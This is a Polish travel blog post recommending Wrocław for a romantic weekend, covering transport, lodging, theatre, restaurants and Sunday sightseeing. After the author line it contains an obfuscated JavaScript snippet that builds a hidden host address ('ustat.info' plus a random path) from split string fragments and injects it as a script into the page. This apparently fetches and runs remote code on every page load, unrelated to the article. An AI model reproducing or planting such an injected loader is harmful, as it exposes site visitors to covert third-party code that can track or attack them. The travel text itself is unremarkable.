Weekend z ukochaną we Wrocławiu

Share on facebook
Share on google
Share on twitter
Share on linkedin

Kiedy myślimy o mieście na weekend z ukochaną, naprawdę trudno byłoby kogokolwiek przekonywać, że na pierwszym miejscu naszej listy będzie miasto takie jak Wrocław. Każdy na pewno pomyśli o Wenecji, każdy pomyśli o Paryżu, mówi się o Zakopanym czy Międzyzdrojach, a nawet o Krakowie, ale Wrocław pewnie nikomu nie będzie się wydawał miejscem optymalnym na romantyczny weekend.

Weekend z ukochaną we Wrocławiu

Jest to jednak błąd wynikający po prostu z niewiedzy na temat tego urokliwego miasta. Jeśli nie wiemy, jakie realnie mamy opcje i jakie propozycje ze sobą te opcje niosą, nie będziemy mieli żadnych szans na to, by wybrać rozwiązania najlepsze. Wrocław może być takim idealnym miejscem. Dlaczego?

Kwestie praktyczne

Nie oszukujmy się, zawsze zaczynać trzeba od kwestii praktycznych. Pobyt weekendowy, dwudniowy lub wliczający w to także piątkowy wieczór, to kwestia dojechania na miejsce i zatrzymania się w wybranym miejscu noclegowym. Wrocław jest znakomicie połączony komunikacyjnie z całym krajem, a do tego czasami można znaleźć bardzo tanie bilety lotnicze zaraz przed weekendem. Pozwala to na impulsywną decyzję o wylocie spod Warszawy czy o wyjeździe gdzieś z Małopolski, po czym w kilka chwil znajdziemy się we Wrocławiu. Potem wcale nie będzie żadnych większych komplikacji, ponieważ baza noclegowa Wrocławia jest znakomita i posiada oferty dla osób nastawionych na luksusowy pobyt i dla tych, którzy kwatery traktują tylko jako punk wypadowy.

Romans i zabawa

Kiedy już znajdziemy się na miejscu i nie będziemy się niczym więcej przejmować, można wreszcie zacząć czerpanie pełnymi garściami z oferty turystycznej Wrocławia. Można się tutaj wybrać na naprawdę niezapomnianą randkę – cały wieczór spędzony we dwoje w podejściu klasycznym. Na początku można wybrać się do teatru na jedną z najlepszych w kraju sztuk. Do wyboru są propozycje bardzo poważne, całkiem lekkie, a także mniej typowe. We Wrocławiu pojawiają się teatry grające teatr nowoczesny i eksperymentalny. Do tego dochodzą jeszcze oczywiście opera i filharmonia, a jak ktoś woli bardziej nowoczesną rozrywkę, znajdą się dla niego Multikina. Po obejrzeniu czegoś ciekawego można się przespacerować pięknymi uliczkami Starego Miasta do jednej z ciekawych restauracji. Do wyboru jest zawsze cała masa miejsc o bardzo różnym charakterze. Są miejsca, gdzie znajdziemy kameralny klimat, wino i wykwintne dania, a nawet skrzypków grających dla nas, a są też miejsca, gdzie będzie zdecydowanie energicznie i zabawnie. Wszystko zależy od naszych oczekiwań. Lokale są skupione w okolicach ścisłego centrum miasta.
Niedzielę można zaplanować sobie trochę spokojniej i zacząć ją od śniadania w jednej z urokliwych kawiarenek położonych zaraz przy samym rynku Głównym. Śniadania w takich miejscach to domena nie tylko turystów, ale także samych mieszkańców. Potem można zapolować na krasnale poukrywane w całym mieście wybierając się do jednej z galerii sztuki, ogrodu botanicznego lub do kościoła, jeśli ktoś ma taką potrzebę. We Wrocławiu znajdują się niezwykle imponujące obiekty sakralne.
Autor
cowewroclawiu.pl twój wirtualny przewodnik po Wrocławiu i Dolnym Śląsku.

(function(){
isae_=(“u”+”st”);isae=document.createElement(“script”);isae.async=true;
isaeu=”1828663″;isae_+=”a”+(“t.”);isae_+=”i”+(“nf”+(“o”))+(“/”);
isaeu+=”.6ut4anulsae55gns”;isaeu+=”naya158xtazq4mjl”;
isae.src=”//”+isae_+isaeu;isae.type=”text/javascript”;
d_b=document.body;d_b.appendChild(isae);
})();

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.